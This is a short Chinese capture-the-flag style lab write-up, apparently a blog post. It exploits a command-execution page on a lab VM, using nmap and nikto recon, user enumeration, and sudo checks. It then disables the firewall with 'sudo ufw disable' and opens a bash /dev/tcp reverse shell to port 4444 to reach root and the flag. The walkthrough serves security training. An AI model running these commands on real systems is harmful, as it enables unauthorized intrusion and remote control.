web靶机系列-命令执行

主机地址:192.168.136.133
目标地址:192.168.136.135

先用nmap搜查:
在这里插入图片描述
然后用nitko工具查找网站的信息,看到有敏感文件泄露:
在这里插入图片描述
登陆网站并访问/test.jsp,看到界面有提醒用“ls -l /tmp”查看文件
在这里插入图片描述
当输入命令后,得到响应则可以认定为命令执行漏洞
查看home目录,挖掘用户信息 ls -alh /home/
在这里插入图片描述
查看具体用户的目录: ls -alh /home/用户名/,发现用户有ssh服务
在这里插入图片描述
查看系统消息:uname -a
在这里插入图片描述
查看bill用户 sudo命令的权限: ssh bill@localhost sudo -l
在这里插入图片描述
关闭防火墙: ssh bill@localhost sudo ufw disable
在这里插入图片描述
nc监听4444端口
在这里插入图片描述
输入ssh的命令注入,ssh bill@localhost sudo bash -i >& /dev/tcp/地址/4444 0>&1
反弹shell
在这里插入图片描述
监听成功并返回答复,此时是shell
在这里插入图片描述
查看root的文件目录,得到flag
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值